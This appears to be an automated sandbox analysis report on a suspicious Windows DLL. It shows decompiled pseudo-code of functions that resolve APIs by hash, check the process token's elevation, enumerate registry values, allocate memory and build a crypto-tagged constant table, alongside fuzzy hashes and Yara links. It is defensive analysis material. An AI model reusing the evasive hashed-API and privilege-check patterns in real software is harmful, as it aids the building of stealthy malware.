Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 30abfac0fae838508be4b997c8bf8189654a324c9c0b1c63216372d3711cb1f9
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 0601F73628830ABBF611EA794D45F7B7B4DDF8165CF004835BA0165585DF327D58C120

Uniqueness

Uniqueness Score: -1.00%

Function 6F515E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6F515E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6F50C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6F513064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6f515e14
0x6f515e15
0x6f515e17
0x6f515e1d
0x6f515e1f
0x6f515e23
0x6f515e23
0x6f515e27
0x6f515e33
0x6f515e67
0x6f515e67
0x00000000
0x6f515e35
0x6f515e3a
0x6f515e3b
0x6f515e4f
0x6f515e60
0x6f515e51
0x6f515e5c
0x6f515e5c
0x6f515e65
0x6f515e6d
0x6f515e6f
0x6f515e72
0x6f515e77
0x6f515e77
0x6f515e7b
0x6f515e80
0x00000000
0x00000000
0x00000000
0x6f515e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6F515D48,?,?), ref: 6F515E5C

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: e1bded18fe82dea211d7e0a9252c1e8f7bbef73e1ec4a613772aadd799d72ee6
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: CFF0D631E0DB116BFB11D93C9D40A9777E9DFD1750F144B7AE640A6180E770BC48C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F51564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F51564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6F513064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6F50E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6f515656
0x6f515658
0x6f51565f
0x6f515661
0x6f515665
0x6f515667
0x6f51566a
0x6f51566d
0x6f51566d
0x6f515687
0x00000000
0x00000000
0x6f515698
0x6f51569c
0x00000000
0x00000000
0x6f5156aa
0x6f5156ad
0x6f5156b2
0x6f5156b7
0x6f5156b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6F515698

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 25393ac8611b11755164493b4cce7885c9cbc20a5c3a28324c9e7ad66e7c7bb2
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: B5F0AFB520430AABF724DE1A9C44DBBBBEDEBD1B50F10852EA4E542240EB31BC54C9B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F511030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F511030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6F51306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6f51103e
0x6f511040
0x6f51104e
0x6f511052
0x6f51109b
0x00000000
0x6f51109b
0x6f511057
0x6f511058
0x6f51105a
0x6f51105f
0x00000000
0x6f511078
0x6f51107c
0x6f511089
0x6f51108d
0x00000000
0x00000000
0x00000000
0x6f511096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6F511089

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: c15ffcb976ce5f27549f6b5174f6e36c10c4aae29e9647ced77b30bce37d39b6
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 0FF0CDB0B48A87ABFA00D5789C25F7F3AED5BC1610F808879B545CA194EF38EC058222

Uniqueness

Uniqueness Score: -1.00%

Function 6F513628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6F513628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6f51d228 == 0xa33c83e5) {
					_t7 = E6F513064(0x60a28c5c, 0x1c6ef387);
					 *0x6f51d22c = E6F513064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6f51d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6f51d228 = 0;
					}
				}
				_t3 = E6F513064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6f51d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6f513630
0x6f513638
0x6f51366b
0x6f51367c
0x6f513687
0x6f513692
0x6f513694
0x6f513694
0x6f513687
0x6f513644
0x6f51364b
0x00000000
0x6f51364d
0x6f51364d
0x6f51364e
0x6f513650
0x6f513652
0x6f513653
0x00000000
0x6f513653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6F50DE09,?,?), ref: 6F513692

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 47f94a2feac542fe394738e72df2b1b82a5e94f0743cc0177e30c6c50a1aaddb
Instruction ID: d14d9975f54913c04688035ac845e476e22dcddb0ce90208959ff849bc6313e7
Opcode Fuzzy Hash: 47f94a2feac542fe394738e72df2b1b82a5e94f0743cc0177e30c6c50a1aaddb
Instruction Fuzzy Hash: EDF0527021E380BFFA20CA7AAC12C16AAE5EF90295F000D39F284B6240C7B0BC80C231

Uniqueness

Uniqueness Score: -1.00%

Function 01581000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 015810FF

Memory Dump Source

Source File: 00000001.00000002.738035827.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: abb0425d7bb397603f73f60825f664e921ab5dcf86a72a4a1c269c550443c18c
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: A241F6B5E0521A8FDB04DFA8C494AAEBBF0FF88314F19856DD548AB340D375A841CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F501494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6F501494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6F50F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v76, E6F50F4CC( &_v76) + 0x10);
				E6F50F4BC( &_v80, E6F50F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v84, E6F50F4CC(_t325) + 0x10);
				E6F50F4BC( &_v88, E6F50F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v92, E6F50F4CC(_t329) + 0x10);
				E6F50F4BC( &_v96, E6F50F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v100, E6F50F4CC(_t333) + 0x10);
				E6F50F4BC( &_v104, E6F50F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v108, E6F50F4CC(_t337) + 0x10);
				E6F50F4BC( &_v112, E6F50F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v116, E6F50F4CC(_t341) + 0x10);
				E6F50F4BC( &_v120, E6F50F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v124, E6F50F4CC(_t345) + 0x10);
				E6F50F4BC( &_v128, E6F50F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v132, E6F50F4CC(_t349) + 0x10);
				E6F50F4BC( &_v136, E6F50F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v140, E6F50F4CC(_t353) + 0x10);
				E6F50F4BC( &_v144, E6F50F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v148, E6F50F4CC(_t357) + 0x10);
				E6F50F4BC( &_v152, E6F50F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v156, E6F50F4CC(_t361) + 0x10);
				E6F50F4BC( &_v160, E6F50F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v164, E6F50F4CC(_t365) + 0x10);
				E6F50F4BC( &_v168, E6F50F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v172, E6F50F4CC(_t369) + 0x10);
				E6F50F4BC( &_v176, E6F50F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v180, E6F50F4CC(_t373) + 0x10);
				E6F50F4BC( &_v184, E6F50F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v188, E6F50F4CC(_t377) + 0x10);
				E6F50F4BC( &_v192, E6F50F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v196, E6F50F4CC(_t381) + 0x10);
				E6F50F4BC( &_v200, E6F50F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v204, E6F50F4CC(_t385) + 0x10);
				E6F50F4BC( &_v208, E6F50F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6F514200(0x60a28c5c, _t434);
				E6F50F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6F50F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6F50F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6F50F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6F50F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6F50F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6F50F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6F50F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6F50F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6F50F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6F50F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6F50F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6F50F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6F50F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6F50F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6F50F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6F50F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6F501D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6F50B27C( &_v248, _v256, _t481, _v252, _t318);
				E6F50F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v296, E6F50F4CC(_t410) + 0x10);
				E6F50F4BC( &_v300, E6F50F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v304, E6F50F4CC(_t414) + 0x10);
				E6F50F4BC( &_v308, E6F50F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v312, E6F50F4CC(_t418) + 0x10);
				E6F50F4BC( &_v316, E6F50F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6F50F828( &_v320, E6F50F4CC(_t422) + 0x10);
				E6F50F4BC( &_v324, E6F50F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6F50B9FC(_t154,  *_t480);
				E6F50F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6F50F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6F50F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6F50F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6F50F654( &_v316);
				return E6F50F654( &_v356);
			}

0x6f501494
0x6f501498
0x6f50149d
0x6f5014a3
0x6f5014ab
0x6f5014b0
0x6f5014bc
0x6f5014c0
0x6f5014d2
0x6f5014e8
0x6f5014f3
0x6f5014f4
0x6f5014f5
0x6f5014f6
0x6f5014f7
0x6f5014fa
0x6f5014fe
0x6f501502
0x6f501509
0x6f50151b
0x6f501531
0x6f50153c
0x6f50153d
0x6f50153e
0x6f50153f
0x6f501540
0x6f501543
0x6f501547
0x6f50154b
0x6f501552
0x6f501564
0x6f50157a
0x6f501585
0x6f501586
0x6f501587
0x6f501588
0x6f501589
0x6f50158c
0x6f501590
0x6f501594
0x6f50159b
0x6f5015ad
0x6f5015c3
0x6f5015ce
0x6f5015cf
0x6f5015d0
0x6f5015d1
0x6f5015d2
0x6f5015d5
0x6f5015d9
0x6f5015dd
0x6f5015e4
0x6f5015f6
0x6f50160c
0x6f501617
0x6f501618
0x6f501619
0x6f50161a
0x6f50161b
0x6f50161e
0x6f501622
0x6f501626
0x6f50162d
0x6f50163f
0x6f501655
0x6f501660
0x6f501661
0x6f501662
0x6f501663
0x6f501664
0x6f501667
0x6f50166b
0x6f50166f
0x6f501676
0x6f501688
0x6f50169e
0x6f5016a9
0x6f5016aa
0x6f5016ab
0x6f5016ac
0x6f5016ad
0x6f5016b0
0x6f5016b4
0x6f5016b8
0x6f5016bf
0x6f5016d1
0x6f5016e7
0x6f5016f2
0x6f5016f3
0x6f5016f4
0x6f5016f5
0x6f5016f6
0x6f5016f9
0x6f5016fd
0x6f501701
0x6f501708
0x6f50171a
0x6f501730
0x6f50173b
0x6f50173c
0x6f50173d
0x6f50173e
0x6f50173f
0x6f501742
0x6f501746
0x6f50174a
0x6f501751
0x6f501763
0x6f501779
0x6f501784
0x6f501785
0x6f501786
0x6f501787
0x6f501788
0x6f50178b
0x6f50178f
0x6f501793
0x6f50179a
0x6f5017ac
0x6f5017c2
0x6f5017cd
0x6f5017ce
0x6f5017cf
0x6f5017d0
0x6f5017d1
0x6f5017d4
0x6f5017d8
0x6f5017dc
0x6f5017e3
0x6f5017f5
0x6f50180b
0x6f501816
0x6f501817
0x6f501818
0x6f501819
0x6f50181a
0x6f50181d
0x6f501821
0x6f501825
0x6f50182c
0x6f50183e
0x6f501854
0x6f50185f
0x6f501860
0x6f501861
0x6f501862
0x6f501863
0x6f501866
0x6f50186a
0x6f50186e
0x6f501875
0x6f501887
0x6f50189d
0x6f5018a8
0x6f5018a9
0x6f5018aa
0x6f5018ab
0x6f5018ac
0x6f5018af
0x6f5018b3
0x6f5018b7
0x6f5018be
0x6f5018d0
0x6f5018e6
0x6f5018f1
0x6f5018f2
0x6f5018f3
0x6f5018f4
0x6f5018f5
0x6f5018f8
0x6f5018fc
0x6f501900
0x6f501907
0x6f501919
0x6f50192f
0x6f50193a
0x6f50193b
0x6f50193c
0x6f50193d
0x6f50193e
0x6f501941
0x6f501945
0x6f501949
0x6f501950
0x6f501962
0x6f501978
0x6f501983
0x6f501984
0x6f501985
0x6f501986
0x6f50198c
0x6f50198f
0x6f501991
0x6f50199c
0x6f5019a3
0x6f5019ac
0x6f5019b4
0x6f5019bb
0x6f5019c4
0x6f5019cc
0x6f5019d3
0x6f5019dc
0x6f5019e4
0x6f5019eb
0x6f5019f4
0x6f5019fc
0x6f501a03
0x6f501a0c
0x6f501a14
0x6f501a1b
0x6f501a24
0x6f501a2c
0x6f501a36
0x6f501a3f
0x6f501a47
0x6f501a51
0x6f501a5a
0x6f501a62
0x6f501a6c
0x6f501a75
0x6f501a7d
0x6f501a87
0x6f501a90
0x6f501a98
0x6f501aa2
0x6f501aab
0x6f501ab3
0x6f501abd
0x6f501ac6
0x6f501ace
0x6f501ad8
0x6f501ae1
0x6f501ae9
0x6f501af3
0x6f501afc
0x6f501b04
0x6f501b0e
0x6f501b17
0x6f501b1f
0x6f501b26
0x6f501b2f
0x6f501b37
0x6f501b3e
0x6f501b43
0x6f501b51
0x6f501b55
0x6f501b64
0x6f501b6d
0x6f501b72
0x6f501b79
0x6f501b7d
0x6f501b81
0x6f501b88
0x6f501b9a
0x6f501bb0
0x6f501bbb
0x6f501bbc
0x6f501bbd
0x6f501bbe
0x6f501bbf
0x6f501bc2
0x6f501bc6
0x6f501bca
0x6f501bd1
0x6f501be3
0x6f501bf9
0x6f501c04
0x6f501c05
0x6f501c06
0x6f501c07
0x6f501c08
0x6f501c0b
0x6f501c0f
0x6f501c13
0x6f501c1a
0x6f501c2c
0x6f501c42
0x6f501c4d
0x6f501c4e
0x6f501c4f
0x6f501c50
0x6f501c51
0x6f501c54
0x6f501c58
0x6f501c5c
0x6f501c63
0x6f501c75
0x6f501c8b
0x6f501c96
0x6f501c97
0x6f501c98
0x6f501c99
0x6f501c9a
0x6f501c9d
0x6f501ca0
0x6f501ca1
0x6f501ca2
0x6f501ca9
0x6f501cac
0x6f501cb7
0x6f501cbe
0x6f501cc7
0x6f501ccf
0x6f501cd6
0x6f501cdf
0x6f501ce7
0x6f501cee
